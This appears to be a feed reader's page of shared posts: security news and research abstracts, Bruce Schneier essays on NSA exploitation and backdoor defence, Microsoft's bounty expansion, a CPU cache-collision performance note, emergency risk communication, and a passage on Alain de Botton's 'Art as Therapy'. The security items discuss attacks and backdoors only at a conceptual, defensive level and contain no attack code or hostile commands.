Shared posts

20 Nov 16:42

Elliptic Curve Cryptography in Practice

by ellipticnews

The recent paper Elliptic Curve Cryptography in Practice by Joppe W. Bos and J. Alex Halderman and Nadia Heninger and Jonathan Moore and Michael Naehrig and Eric Wustrow is well worth reading. The discovery in 2012 of a large number of RSA public keys with common factors showed that public key cryptography can go badly wrong in the real world. This paper reports on a thorough evaluation of ECC systems in the real world. Some of them, for example the Austrian e-ID citizen card, are found to have no weaknesses. However, serious issues are discovered with some other systems. In particular, the paper gives evidence that a theft of 59 bitcoins was achieved by an attacker exploiting duplicated nonces in ECDSA signatures. Further issues with bitcoin are discussed. The paper also reports some potentially serious bugs in TLS implementations in some commercially available devices. The paper does not reveal details of any companies or individuals affected by these issues.

— Steven Galbraith


18 Nov 09:20

Plaintext Recovery Attacks Against WPA/TKIP, by Kenneth G. Paterson and Bertram Poettering and Jacob C.N. Schuldt

We conduct an analysis of the RC4 algorithm as it is used in the IEEE WPA/TKIP wireless standard. In that standard, RC4 keys are computed on a per-frame basis, with specific key bytes being set to known values that depend on 2 bytes of the WPA frame counter (called the TSC). We observe very large, TSC-dependent biases in the RC4 keystream when the algorithm is keyed according to the WPA specification. These biases permit us to mount an effective statistical, plaintext-recovering attack in the situation where the same plaintext is encrypted in many different frames (the so-called ``broadcast attack'' setting). We assess the practical impact of these attacks on WPA/TKIP.
14 Nov 09:58

Elliptic Curve Cryptography in Practice, by Joppe W. Bos and J. Alex Halderman and Nadia Heninger and Jonathan Moore and Michael Naehrig and Eric Wustrow

In this paper, we perform a review of elliptic curve cryptography (ECC), as it is used in practice today, in order to reveal unique mistakes and vulnerabilities that arise in implementations of ECC. We study four popular protocols that make use of this type of public-key cryptography: Bitcoin, secure shell (SSH), transport layer security (TLS), and the Austrian e-ID card. We are pleased to observe that about 1 in 10 systems support ECC across the TLS and SSH protocols. However, we find that despite the high stakes of money, access and resources protected by ECC, implementations suffer from vulnerabilities similar to those that plague previous cryptographic systems.
11 Nov 16:42

Dan Geer Explains the Government Surveillance Mentality

by Bruce Schneier

This talk by Dan Geer explains the NSA mindset of "collect everything":

I previously worked for a data protection company. Our product was, and I believe still is, the most thorough on the market. By "thorough" I mean the dictionary definition, "careful about doing something in an accurate and exact way." To this end, installing our product instrumented every system call on the target machine. Data did not and could not move in any sense of the word "move" without detection. Every data operation was caught and monitored. It was total surveillance data protection. Its customers were companies that don't accept half-measures. What made this product stick out was that very thoroughness, but here is the point: Unless you fully instrument your data handling, it is not possible for you to say what did not happen. With total surveillance, and total surveillance alone, it is possible to treat the absence of evidence as the evidence of absence. Only when you know everything that *did* happen with your data can you say what did *not* happen with your data.

The alternative to total surveillance of data handling is to answer more narrow questions, questions like "Can the user steal data with a USB stick?" or "Does this outbound e-mail have a Social Security Number in it?" Answering direct questions is exactly what a defensive mindset says you must do, and that is "never make the same mistake twice." In other words, if someone has lost data because of misuse of some facility on the computer, then you either disable that facility or you wrap it in some kind of perimeter. Lather, rinse, and repeat. This extends all the way to such trivial matters as timer-based screen locking.

The difficulty with the defensive mindset is that it leaves in place the fundamental strategic asymmetry of cybersecurity, namely that while the workfactor for the offender is the price of finding a new method of attack, the workfactor for the defender is the cumulative cost of forever defending against all attack methods yet discovered. Over time, the curve for the cost of finding a new attack and the curve for the cost of defending against all attacks to date cross. Once those curves cross, the offender never has to worry about being out of the money. I believe that that crossing occurred some time ago.

The total surveillance strategy is, to my mind, an offensive strategy used for defensive purposes. It says "I don't know what the opposition is going to try, so everything is forbidden unless we know it is good." In that sense, it is like whitelisting applications. Taking either the application whitelisting or the total data surveillance approach is saying "That which is not permitted is forbidden."

[...]

We all know the truism, that knowledge is power. We all know that there is a subtle yet important distinction between information and knowledge. We all know that a negative declaration like "X did not happen" can only proven true if you have the enumeration of *everything* that did happen and can show that X is not in it. We all know that when a President says "Never again" he is asking for the kind of outcome for which proving a negative, lots of negatives, is categorically essential. Proving a negative requires omniscience. Omniscience requires god-like powers.

The whole essay is well worth reading.

07 Nov 19:01

Microsoft, Facebook: We'll pay cash if you can poke a hole in the INTERNET

by Iain Thomson

New bug-hunting program to shore up security across the whole damn web

While Facebook and Microsoft already run security bug bounty programs of their own, the two companies are now working together to reward researchers who can find flaws in some of the underlying technologies behind online communications.…

07 Nov 19:01

New Internet Bug Bounty holds companies accountable, protects hackers

Security high-hats from Microsoft, Facebook and others have launched HackerOne: an open call for hackers to submit Internet bugs for cash. Hackers can remain anonymous, while all vulns are made public.
07 Nov 16:33

Risk-Based Authentication

by Bruce Schneier

I like this idea of giving each individual login attempt a risk score, based on the characteristics of the attempt:

The risk score estimates the risk associated with a log-in attempt based on a user's typical log-in and usage profile, taking into account their device and geographic location, the system they're trying to access, the time of day they typically log in, their device's IP address, and even their typing speed. An employee logging into a CRM system using the same laptop, at roughly the same time of day, from the same location and IP address will have a low risk score. By contrast, an attempt to access a finance system from a tablet at night in Bali could potentially yield an elevated risk score.

Risk thresholds for individual systems are established based on the sensitivity of the information they store and the impact if the system were breached. Systems housing confidential financial data, for example, will have a low risk threshold.

If the risk score for a user's access attempt exceeds the system's risk threshold, authentication controls are automatically elevated, and the user may be required to provide a higher level of authentication, such as a PIN or token. If the risk score is too high, it may be rejected outright.

06 Nov 11:30

The NSA's New Risk Analysis

by schneier

As I recently reported in the Guardian, the NSA has secret servers on the Internet that hack into other computers, codename FOXACID. These servers provide an excellent demonstration of how the NSA approaches risk management, and exposes flaws in how the agency thinks about the secrecy of its own programs.

Here are the FOXACID basics: By the time the NSA tricks a target into visiting one of those servers, it already knows exactly who that target is, who wants him eavesdropped on, and the expected value of the data it hopes to receive. Based on that information, the server can automatically decide what exploit to serve the target, taking into account the risks associated with attacking the target, as well as the benefits of a successful attack. According to a top-secret operational procedures manual provided by Edward Snowden, an exploit named Validator might be the default, but the NSA has a variety of options. The documentation mentions United Rake, Peddle Cheap, Packet Wrench, and Beach Head -- all delivered from a FOXACID subsystem called Ferret Cannon. Oh how I love some of these code names. (On the other hand, EGOTISTICALGIRAFFE has to be the dumbest code name ever.)

Snowden explained this to Guardian reporter Glenn Greenwald in Hong Kong. If the target is a high-value one, FOXACID might run a rare zero-day exploit that it developed or purchased. If the target is technically sophisticated, FOXACID might decide that there's too much chance for discovery, and keeping the zero-day exploit a secret is more important. If the target is a low-value one, FOXACID might run an exploit that's less valuable. If the target is low-value and technically sophisticated, FOXACID might even run an already-known vulnerability.

We know that the NSA receives advance warning from Microsoft of vulnerabilities that will soon be patched; there's not much of a loss if an exploit based on that vulnerability is discovered. FOXACID has tiers of exploits it can run, and uses a complicated trade-off system to determine which one to run against any particular target.

This cost-benefit analysis doesn't end at successful exploitation. According to Snowden, the TAO -- that's Tailored Access Operations -- operators running the FOXACID system have a detailed flowchart, with tons of rules about when to stop. If something doesn't work, stop. If they detect a PSP, a personal security product, stop. If anything goes weird, stop. This is how the NSA avoids detection, and also how it takes mid-level computer operators and turn them into what they call "cyberwarriors." It's not that they're skilled hackers, it's that the procedures do the work for them.

And they're super cautious about what they do.

While the NSA excels at performing this cost-benefit analysis at the tactical level, it's far less competent at doing the same thing at the policy level. The organization seems to be good enough at assessing the risk of discovery -- for example, if the target of an intelligence-gathering effort discovers that effort -- but to have completely ignored the risks of those efforts becoming front-page news.

It's not just in the U.S., where newspapers are heavy with reports of the NSA spying on every Verizon customer, spying on domestic e-mail users, and secretly working to cripple commercial cryptography systems, but also around the world, most notably in Brazil, Belgium, and the European Union. All of these operations have caused significant blowback -- for the NSA, for the U.S., and for the Internet as a whole.

The NSA spent decades operating in almost complete secrecy, but those days are over. As the corporate world learned years ago, secrets are hard to keep in the information age, and openness is a safer strategy. The tendency to classify everything means that the NSA won't be able to sort what really needs to remain secret from everything else. The younger generation is more used to radical transparency than secrecy, and is less invested in the national security state. And whistleblowing is the civil disobedience of our time.

At this point, the NSA has to assume that all of its operations will become public, probably sooner than it would like. It has to start taking that into account when weighing the costs and benefits of those operations. And it now has to be just as cautious about new eavesdropping operations as it is about using FOXACID exploits attacks against users.

This essay previously appeared in the Atlantic.

06 Nov 11:24

Defending Against Crypto Backdoors

by schneier

We already know the NSA wants to eavesdrop on the Internet. It has secret agreements with telcos to get direct access to bulk Internet traffic. It has massive systems like TUMULT, TURMOIL, and TURBULENCE to sift through it all. And it can identify ciphertext -- encrypted information -- and figure out which programs could have created it.

But what the NSA wants is to be able to read that encrypted information in as close to real-time as possible. It wants backdoors, just like the cybercriminals and less benevolent governments do.

And we have to figure out how to make it harder for them, or anyone else, to insert those backdoors.

How the NSA Gets Its Backdoors

The FBI tried to get backdoor access embedded in an AT&T secure telephone system in the mid-1990s. The Clipper Chip included something called a LEAF: a Law Enforcement Access Field. It was the key used to encrypt the phone conversation, itself encrypted in a special key known to the FBI, and it was transmitted along with the phone conversation. An FBI eavesdropper could intercept the LEAF and decrypt it, then use the data to eavesdrop on the phone call.

But the Clipper Chip faced severe backlash, and became defunct a few years after being announced.

Having lost that public battle, the NSA decided to get its backdoors through subterfuge: by asking nicely, pressuring, threatening, bribing, or mandating through secret order. The general name for this program is BULLRUN.

Defending against these attacks is difficult. We know from subliminal channel and kleptography research that it's pretty much impossible to guarantee that a complex piece of software isn't leaking secret information. We know from Ken Thompson's famous talk on "trusting trust" (first delivered in the ACM Turing Award Lectures) that you can never be totally sure if there's a security flaw in your software.

Since BULLRUN became public last month, the security community has been examining security flaws discovered over the past several years, looking for signs of deliberate tampering. The Debian random number flaw was probably not deliberate, but the 2003 Linux security vulnerability probably was. The DUAL_EC_DRBG random number generator may or may not have been a backdoor. The SSL 2.0 flaw was probably an honest mistake. The GSM A5/1 encryption algorithm was almost certainly deliberately weakened. All the common RSA moduli out there in the wild: we don't know. Microsoft's _NSAKEY looks like a smoking gun, but honestly, we don't know.

How the NSA Designs Backdoors

While a separate program that sends our data to some IP address somewhere is certainly how any hacker -- from the lowliest script kiddie up to the NSA -- spies on our computers, it's too labor-intensive to work in the general case.

For government eavesdroppers like the NSA, subtlety is critical. In particular, three characteristics are important:

  • Low discoverability. The less the backdoor affects the normal operations of the program, the better. Ideally, it shouldn't affect functionality at all. The smaller the backdoor is, the better. Ideally, it should just look like normal functional code. As a blatant example, an email encryption backdoor that appends a plaintext copy to the encrypted copy is much less desirable than a backdoor that reuses most of the key bits in a public IV (initialization vector).

  • High deniability. If discovered, the backdoor should look like a mistake. It could be a single opcode change. Or maybe a "mistyped" constant. Or "accidentally" reusing a single-use key multiple times. This is the main reason I am skeptical about _NSAKEY as a deliberate backdoor, and why so many people don't believe the DUAL_EC_DRBG backdoor is real: they're both too obvious.

  • Minimal conspiracy. The more people who know about the backdoor, the more likely the secret is to get out. So any good backdoor should be known to very few people. That's why the recently described potential vulnerability in Intel's random number generator worries me so much; one person could make this change during mask generation, and no one else would know.

These characteristics imply several things:

  • A closed-source system is safer to subvert, because an open-source system comes with a greater risk of that subversion being discovered. On the other hand, a big open-source system with a lot of developers and sloppy version control is easier to subvert.

  • If a software system only has to interoperate with itself, then it is easier to subvert. For example, a closed VPN encryption system only has to interoperate with other instances of that same proprietary system. This is easier to subvert than an industry-wide VPN standard that has to interoperate with equipment from other vendors.

  • A commercial software system is easier to subvert, because the profit motive provides a strong incentive for the company to go along with the NSA's requests.

  • Protocols developed by large open standards bodies are harder to influence, because a lot of eyes are paying attention. Systems designed by closed standards bodies are easier to influence, especially if the people involved in the standards don't really understand security.

  • Systems that send seemingly random information in the clear are easier to subvert. One of the most effective ways of subverting a system is by leaking key information -- recall the LEAF -- and modifying random nonces or header information is the easiest way to do that.

Design Strategies for Defending against Backdoors

With these principles in mind, we can list design strategies. None of them is foolproof, but they are all useful. I'm sure there's more; this list isn't meant to be exhaustive, nor the final word on the topic. It's simply a starting place for discussion. But it won't work unless customers start demanding software with this sort of transparency.

  • Vendors should make their encryption code public, including the protocol specifications. This will allow others to examine the code for vulnerabilities. It's true we won't know for sure if the code we're seeing is the code that's actually used in the application, but surreptitious substitution is hard to do, forces the company to outright lie, and increases the number of people required for the conspiracy to work.

  • The community should create independent compatible versions of encryption systems, to verify they are operating properly. I envision companies paying for these independent versions, and universities accepting this sort of work as good practice for their students. And yes, I know this can be very hard in practice.

  • There should be no master secrets. These are just too vulnerable.

  • All random number generators should conform to published and accepted standards. Breaking the random number generator is the easiest difficult-to-detect method of subverting an encryption system. A corollary: we need better published and accepted RNG standards.

  • Encryption protocols should be designed so as not to leak any random information. Nonces should be considered part of the key or public predictable counters if possible. Again, the goal is to make it harder to subtly leak key bits in this information.

This is a hard problem. We don't have any technical controls that protect users from the authors of their software.

And the current state of software makes the problem even harder: Modern apps chatter endlessly on the Internet, providing noise and cover for covert communications. Feature bloat provides a greater "attack surface" for anyone wanting to install a backdoor.

In general, what we need is assurance: methodologies for ensuring that a piece of software does what it's supposed to do and nothing more. Unfortunately, we're terrible at this. Even worse, there's not a lot of practical research in this area -- and it's hurting us badly right now.

Yes, we need legal prohibitions against the NSA trying to subvert authors and deliberately weaken cryptography. But this isn't just about the NSA, and legal controls won't protect against those who don't follow the law and ignore international agreements. We need to make their job harder by increasing their risk of discovery. Against a risk-averse adversary, it might be good enough.

This essay previously appeared on Wired.com.

EDITED TO ADD: I am looking for other examples of known or plausible instances of intentional vulnerabilities for a paper I am writing on this topic. If you can think of an example, please post a description and reference in the comments below. Please explain why you think the vulnerability could be intentional. Thank you.

05 Nov 18:52

Bounty Evolution: $100,000 for New Mitigation Bypass Techniques Wanted Dead or Alive

by BlueHat1

Those who know me personally or follow me on Twitter are familiar with my obsession with karaoke. I do it as often as I can rope people into going with me, never forcing anyone to sing, though invariably everyone does – or at least sings from the sidelines to the songs they know. One of my all-time favorite songs is Bon Jovi’s Wanted Dead or Alive, and it’s the song in my head as I write this post. By the end, I hope to have a few more people singing along. Go ahead and load it into the playlist as you read on.

Today, Microsoft is announcing the first evolution of its bounty programs, first announced in June of 2013. We are expanding the pool of talent who can participate and submit novel mitigation bypass techniques and defensive ideas to include responders and forensic experts who find active attacks in the wild. That means more people can “sing along” to earn big bounty payouts than ever before.

Today’s news means we are going from accepting entries from only a handful of individuals capable of inventing new mitigation bypass techniques on their own, to potentially thousands of individuals or organizations who find attacks in the wild. Now, both finders and discoverers can turn in new techniques for $100,000.

Our platform-wide defenses, or mitigations, are a kind of shield that protects the entire operating system and all the applications running on it. Individual bugs are like arrows.  The stronger the shield, the less likely any individual bug or arrow can get through. Learning about “ways around the shield,” or new mitigation bypass techniques, is much more valuable than learning about individual bugs because insight into exploit techniques can help us defend against entire classes of attack as opposed to a single bug – hence, we are willing to pay $100,000 for these rare new techniques.

Building upon the success of our strategic bounty programs, Microsoft is evolving the bounty landscape to the benefit of our customers. The bounty programs we have created are designed to change the dynamics and the economics of the current vulnerability market. We currently do this in a few ways:

  1. Offering bounties for bugs when other buyers typically are not buying them (e.g. during the preview/beta period) allows Microsoft to get a number of critical bugs out of the market before they are widely traded in grey or black markets and subsequently used to attack customers.

  2. Offering researchers a $100,000 bounty to teach us new mitigation bypass techniques enables us to build better defenses into our products faster and to provide workarounds and mitigations through tools such as EMET.

  3. Evolving our bounty programs to include responders and forensic experts, who can turn in techniques that are being used in active attacks, enables us to work on building better defenses in to our products. We will work whenever possible with our MAPP program and engage our community network of defenders to help mitigate these attacks more rapidly.

In this new expansion of Microsoft’s bounty programs, organizations and individuals are eligible to submit Proof-of-Concept code and technical analysis of exploits they find in active use in the wild for our standard bounty amount of up to $100,000. Participants would also be eligible for up to $50,000 in addition if they also submit a qualifying defense idea. The submission criteria for both programs are similar – but the source may be different.

To participate in the expanded bounty program, organizations must pre-register with us before turning in a submission by emailing us at doa [at] Microsoft [dot] com. After you preregister and sign an agreement, then we’ll accept an entry of technical write-up and proof of concept code for bounty consideration.

We want to learn about these rare new exploitation techniques as early as possible, ideally before they are used, but we’ll pay for them even if they are currently being used in targeted attacks if the attack technique is new – because we want them dead or alive.

This evolution of our bounty programs is designed to further disrupt the vulnerability and exploit markets. Currently, black markets pay high prices for vulnerabilities and exploits based on factors that include exclusivity and longevity of usefulness before a vendor discovers and mitigates it.  By expanding our bounty program, Microsoft is cutting down the time that exploits and vulnerabilities purchased on the black market remain useful, especially for targeted attacks that rely on stealthy exploitation without discovery.

We shall see how the song plays out, but I for one am excited for more singers to step up to the microphone, or to sing out from the sidelines.

 

Katie Moussouris

Senior Security Strategist and karaoke MC

Microsoft Security Response Center

http://twitter.com/k8em0
(that’s a zero)

05 Nov 09:29

Outsourced Symmetric Private Information Retrieval, by Stanislaw Jarecki and Charanjit Jutla and Hugo Krawczyk and Marcel Rosu and Michael Steiner

In the setting of searchable symmetric encryption (SSE), a data owner D outsources a database (or document/file collection) to a remote server E in encrypted form such that D can later search the collection at E while hiding information about the database and queries from E. Leakage to E is to be confined to well-defined forms of data-access and query patterns while preventing disclosure of explicit data and query plaintext values. Recently, Cash et al presented a protocol, OXT, which can run arbitrary Boolean queries in the SSE setting and which is remarkably efficient even for very large databases. In this paper we investigate a richer setting in which the data owner D outsources its data to a server E but D is now interested to allow clients (third parties) to search the database such that clients learn the information D authorizes them to learn but nothing else while E still does not learn about the data or queried values as in the basic SSE setting. Furthermore, motivated by a wide range of applications, we extend this model and requirements to a setting where, similarly to private information retrieval, the client's queried values need to be hidden also from the data owner D even though the latter still needs to authorize the query. Finally, we consider the scenario in which authorization can be enforced by the data owner D without D learning the policy, a setting that arises in court-issued search warrants. We extend the OXT protocol of Cash et al to support arbitrary Boolean queries in all of the above models while withstanding adversarial non-colluding servers (D and E) and arbitrarily malicious clients, and while preserving the remarkable performance of the protocol.
01 Nov 08:53

CPU cache collisions in the context of performance

by jarek

This article discusses some potential performance issues caused by CPU cache collisions.

In normal scenarios cache collisions don’t pose a problem, it usually is only in specific, high speed
applications that they may incur noticeable performance penalties, and as such, things described
here should be considered “the last mile effort”.
As an example, I will use my laptop’s CPU, Intel Core i5 1.7GHz that has 32kB 8-way L1 data cache per core.

  • CPUs have caches organized in cachelines. For Intel and AMD, cachelines are 64 bytes long.
    When CPU needs to reach to a byte located in memory at the address 100, the whole chunk from
    addresses 64-127 is being pulled to cache. Since my example CPU has a 32kB L1 data cache
    per core, this means 512 such cachelines. The size of 64 bytes also means, that the six
    least significant bits of address index byte within the cacheline:
    address bits:    |       0 - 5      |       6 - ...     |
                     | cacheline offset |
    
  • Cachelines are organized in buckets. “8-way” means that each bucket holds 8 cachelines in it.
    Therefore my CPU L1 data cache has 512 cachelines kept in 64 buckets. In order to address those 64 buckets,
    next 6 bits are used from the address word, full address resolution within this L1 cache goes as follows:
    address bits:    |       0 - 5      |      6 - 11     |                12 - ...             |
                     | cacheline offset | bucket selector | cacheline identifier withing bucket |
    
  • Crucial to understand here is, that for this CPU, data separated by N x 4096 bytes
    (N x 12 the first bits) will always end up in the same bucket. So a lot of data chunks
    spaced by N x 4096 bytes, processed in a parallel manner can cause excessive evictions
    of cachelines from buckets thereby defeating the benefits of L1 cache.

To test the performance degradation I wrote a test C program
(
full C source here
)
that generates a number of vectors of pseudo random integers, sums them up in a typically parallel
optimized way, and estimates the resulting speed. Program takes a couple
of parameters from command line so that various CPUs and scenarios can be tested.
Here are results of three test runs on my example CPU:

  1. 100000 iterations, 30 vectors, 1000 integers each, aligned to 1010 integers = 2396 MOP/s
  2. 100000 iterations, 30 vectors, 1000 integers each, aligned to 1024 integers = 890 MOP/s
  3. 100000 iterations, 30 vectors, 1000 integers each, aligned to 1030 integers = 2415 MOP/s

In this CPU, L1 cache has 4 cycles of latency, L2 cache has 12 cycles of latency, hence
the performance drop to almost 1/3 when alignment hit the N x 4096 condition, CPU pretty much fell
back from L1 to L2. While this is a synthetic example, real life applications may not be affected
this much, but I’ve seen applications losing 30-40% to this single factor.

Parting remarks:

  • You may need to take into consideration a structure of cache not only it’s size, as in this case,
    even data chunked into pieces small enough to fit into L1, still can fail to take full advantage of it.
  • The issue cannot be solved by rewriting critical section logic in C/C++/assembly or any other
    “super-fast language of your choice”, this is a behavior dictated by hardware specifics.
  • Developers’ habit of aligning to the even boundaries, especially to the page boundaries,
    can work against you.
  • Padding can help break out of the performance drop.
  • Sometimes, the easiest workaround is a platform change, i.e. switching from Intel to AMD
    or the other way. Although keep in mind, it doesn’t really solve the issue, different platforms
    just manifest it for different data layouts.
31 Oct 11:35

Building Security in Maturity Model Includes Bug-Bounty Programs

The fifth iteration of this best practices for security framework adds a critical new component that few organization have today.
31 Oct 10:18

How to deal with emergencies better

by Ross Anderson

Britain has just been hit by a storm; two people have been killed by falling trees, and one swept out to sea. The rail network is in chaos and over 100,000 homes lost electric power. What can security engineering teach about such events?

Risk communication could be very much better. The storm had been forecast for several days but the instructions and advice from authority have almost all been framed in vague and general terms. Our research on browser warnings shows that people mostly ignore vague warnings (“Warning – visiting this web site may harm your computer!”) but pay much more attention to concrete ones (such as “The site you are about to visit has been confirmed to contain software that poses a significant risk to you, with no tangible benefit. It would try to infect your computer with malware designed to steal your bank account and credit card details in order to defraud you”). In fact, making warnings more concrete is the only thing that works here – nudge favourites such as appealing to social norms, or authority, or even putting a cartoon face on the page to activate social cognition, don’t seem to have a significant effect in this context.

So how should the Met Office and the emergency services deal with the next storm?

While driving to work I heard a council official telling people not to take their own saws to fallen tree branches, but wait for council crews. A left-leaning listener might interpret this as a lawyerly “Right, I’ve covered by backside by saying that” while a conservative-leaning one might hear a trade unionist line “Don’t you dare take bread out of the mouths of the workers!” Government spokespersons score pretty low on most trust scales and people tend to project on them the lowest motives of whichever party they support least. It would surely have been better to say “If a road is blocked by a tree, just call us and we’ll send a crew round. If you absolutely can’t wait, take care! There are accidents every year when someone cuts halfway through a branch, and it cracks and the rest of the tree falls on them.”

Similarly, in the run-up to the storm, the weather forecaster might usefully say “We had three people unfortunately killed last time in 2013, and 30 killed in the big storm of 1987. Most fatal injuries are from falling trees, then flying debris, then people being washed out to sea. So stay at home if you can. If you really must go out, keep your eyes open, so you can duck if something is blown your way. And don’t stand right on the seafront to admire the waves. Twenty-foot waves can be awesome, but every so often a forty-foot one comes along. So keep your distance.”

A useful way of thinking about it might be this: what advice would you yourself heed if it came from the politician you trust the least? You won’t buy any of his argument, but you may well accept a reminder of a fact that you knew already.

26 Oct 14:50

Art as Therapy: Alain de Botton on the 7 Psychological Functions of Art

by Maria Popova

“Art holds out the promise of inner wholeness.”

The question of what art is has occupied humanity since the dawn of recorded history. For Tolstoy, the purpose of art was to provide a bridge of empathy between us and others, and for Anaïs Nin, a way to exorcise our emotional excess. But the highest achievement of art might be something that reconciles the two: a channel of empathy into our own psychology that lets us both exorcise and better understand our emotions — in other words, a form of therapy.

In Art as Therapy (public library), philosopher Alain de Botton — who has previously examined such diverse and provocative subjects as why work doesn’t work, what education and the arts can learn from religion, and how to think more about sex — teams up with art historian John Armstrong to examine art’s most intimate purpose: its ability to mediate our psychological shortcomings and assuage our anxieties about imperfection. Their basic proposition is that, far more than mere aesthetic indulgence, art is a tool — a tool that serves a rather complex yet straightforwardly important purpose in our existence:

Like other tools, art has the power to extend our capacities beyond those that nature has originally endowed us with. Art compensates us for certain inborn weaknesses, in this case of the mind rather than the body, weaknesses that we can refer to as psychological frailties.

De Botton and Armstrong go on to outline the seven core psychological functions of art:

1. REMEMBERING

Given the profound flaws of our memory and the unreliability of its self-revision, it’s unsurprising that the fear of forgetting — forgetting specific details about people and places, but also forgetting all the minute, mundane building blocks that fuse together into the general wholeness of who we are — would be an enormous source of distress for us. Since both memory and art are as much about what is being left out as about what is being spotlighted, de Botton and Armstrong argue that art offers an antidote to this unease:

What we’re worried about forgetting … tends to be quite particular. It isn’t just anything about a person or scene that’s at stake; we want to remember what really matters, and the people we call good artists are, in part, the ones who appear to have made the right choices about what to communicate and what to leave out. … We might say that good artwork pins down the core of significance, while its bad counterpart, although undeniably reminding us of something, lets an essence slip away. It is an empty souvenir.

'We don't just observe her, we get to know what is important about her.' Johannes Vermeer, 'Woman in Blue Reading a Letter' (1663).

Art, then, is not only what rests in the frame, but is itself a frame for experience:

Art is a way of preserving experiences, of which there are many transient and beautiful examples, and that we need help containing.

2. HOPE

Our conflicted relationship with beauty presents a peculiar paradox: The most universally admired art is of the “pretty” kind — depictions of cheerful and pleasant scenes, faces, objects, and situations — yet “serious” art critics and connoisseurs see it as a failure of taste and of intelligence. (Per Susan Sontag’s memorable definition, the two are inextricably intertwined anyway: “Intelligence … is really a kind of taste: taste in ideas.”) De Bottom and Armstrong consider the implications:

The love of prettiness is often deemed a low, even a “bad” response, but because it is so dominant and widespread it deserves attention, and may hold important clues about a key function of art. … The worries about prettiness are twofold. Firstly, pretty pictures are alleged to feed sentimentality. Sentimentality is a symptom of insufficient engagement with complexity, by which one really means problems. The pretty picture seems to suggest that in order to make life nice, one merely has to brighten up the apartment with a depiction of some flowers. If we were to ask the picture what is wrong with the world, it might be taken as saying ‘you don’t have enough Japanese water gardens’ — a response that appears to ignore all the more urgent problems that confront humanity. . . . . The very innocence and simplicity of the picture seems to militate against any attempt to improve life as a whole. Secondly, there is the related fear that prettiness will numb us and leave us insufficiently critical and alert to the injustices surrounding us.

But these worries, they argue, are misguided. Optimism, rather than a failure of intelligence, is a critical cognitive and psychoemotional skill in our quest to live well — something even neuroscience has indicated — and hope, its chariot, is something to cherish, not condemn:

Cheerfulness is an achievement, and hope is something to celebrate. If optimism is important, it’s because many outcomes are determined by how much of it we bring to the task. It is an important ingredient of success. This flies in the face of the elite view that talent is the primary requirement of a good life, but in many cases the difference between success and failure is determined by nothing more than our sense of what is possible and the energy we can muster to convince others of our due. We might be doomed not by a lack of skill, but by an absence of hope.

Put simply and poignantly, it pays to “imagine immensities.”

'What hope might look like.' Henry Matisse, 'Dance' (II), 1909.

They offer an example:

The dancers in Matisse’s painting are not in denial of the troubles of this planet, but from the standpoint of our imperfect and conflicted — but ordinary — relationship with reality, we can look to their attitude for encouragement. They put us in touch with a blithe, carefree part of ourselves that can help us cope with inevitable rejections and humiliations. The picture does not suggest that all is well, any more than it suggests that women always delight in each other’s existence and bond together in mutually supportive networks.

And so we return to why prettiness sings to us:

The more difficult our lives, the more a graceful depiction of a flower might move us. The tears — if they come — are in response not to how sad the image is, but how pretty.

[…]

We should be able to enjoy an ideal image without regarding it as a false picture of how things usually are. A beautiful, though partial, vision can be all the more precious to us because we are so aware of how rarely life satisfies our desires.

3. SORROW

Since we’re creatures of infinite inner contradiction, art can help us be more whole not only by expanding our capacity for positive emotions but also by helping us to fully inhabit and metabolize the negative — and by doing so with dignity and by reminding us “of the legitimate place of sorrow in a good life”:

One of the unexpectedly important things that art can do for us is teach us how to suffer more successfully. … We can see a great deal of artistic achievement as “sublimated” sorrow on the part of the artist, and in turn, in its reception, on the part of the audience. The term sublimation derives from chemistry. It names the process by which a solid substance is directly transformed into a gas, without first becoming liquid. In art, sublimation refers to the psychological processes of transformation, in which base and unimpressive experiences are converted into something noble and fine — exactly what may happen when sorrow meets art.

'Sublimation: the transformation of suffering into beauty.' Nan Goldin, 'Siobhan in My Mirror' (1992).

Above all, de Botton and Armstrong argue, art helps us feel less alone in our suffering, to which the social expression of our private sorrows lends a kind of affirmative dignity. They offer an example in the work of photographer Nan Goldin, who explored the lives of the queer community with equal parts curiosity and respect long before champions like Andrew Sullivan first pulled the politics of homosexuality into the limelight of mainstream cultural discourse:

Until far too recently, homosexuality lay largely outside the province of art. In Nan Goldin’s work, it is, redemptively, one of its central themes. Goldin’s art is filled with a generous attentiveness towards the lives of its subjects. Although we might not be conscious of it at first, her photograph of a young and, as we discern, lesbian woman examining herself in the mirror is composed with utmost care. The device of reflection is key. In the room itself the woman is out of focus; we don’t see her directly, just the side of her face an and the blur or a hand. The accent is on the make-up she has just been using. It is in the mirror that we see her as she wants to be seen: striking and stylish, her hand suave and eloquent. The work of art functions like a kindly voice that says, “I see you as you hope to be seen, I see you as worthy of love.” The photograph understands the longing to become a more polished and elegant version of oneself. It sounds, of course, an entirely obvious wish; but for centuries, partly because there were no Goldins, it was anything but.

Therein, they argue, lies one of art’s greatest gifts:

Art can offer a grand and serious vantage point from which to survey the travails of our condition.

4. REBALANCING

With our fluid selves, clusters of tormenting contradictions, and culture of prioritizing productivity over presence, no wonder we find ourselves in need of recentering. That’s precisely what art can offer:

Few of us are entirely well balanced. Our psychological histories, relationships and working routines mean that our emotions can incline grievously in one direction or another. We may, for example, have a tendency to be too complacent, or too insecure; too trusting, or too suspicious; too serious, or too light-hearted. Art can put us in touch with concentrated doses of our missing dispositions, and thereby restore a measure of equilibrium to our listing inner selves.

This function of art also helps explain the vast diversity of our aesthetic preferences — because our individual imbalances differ, so do the artworks we seek out to soothe them:

Why are some people drawn to minimalist architecture and others to Baroque? Why are some people excited by bare concrete walls and others by William Morris’s floral patterns? Our tastes will depend on what spectrum of our emotional make-up lies in shadow and is hence in need of stimulation and emphasis. Every work of art is imbued with a particular psychological and moral atmosphere: a painting may be either serene or restless, courageous or careful, modest or confident, masculine or feminine, bourgeois or aristocratic, and our preferences for one kind over another reflect our varied psychological gaps. We hunger for artworks that will compensate for our inner fragilities and help return us to a viable mean. We call a work beautiful when it supplies the virtues we are missing, and we dismiss as ugly one that forces on us moods or motifs that we feel either threatened or already overwhelmed by. Art holds out the promise of inner wholeness.

Viewing art from this perspective, de Botton and Armstrong argue, also affords us the necessary self-awareness to understand why we might respond negatively to a piece of art — an insight that might prevent us from reactive disparagement. Being able to recognize what someone lacks in order to find an artwork beautiful allows us to embody that essential practice of prioritizing understanding over self-righteousness. In this respect, art is also a tuning — and atoning — mechanism for our moral virtues. In fact, some of history’s most celebrated art is anchored on moralistic missions — what de Botton and Armstrong call “an attempt to encourage our better selves through coded messages of exhortation and admonition” — to which we often respond with resistance and indignation. But such reactions miss the bigger point:

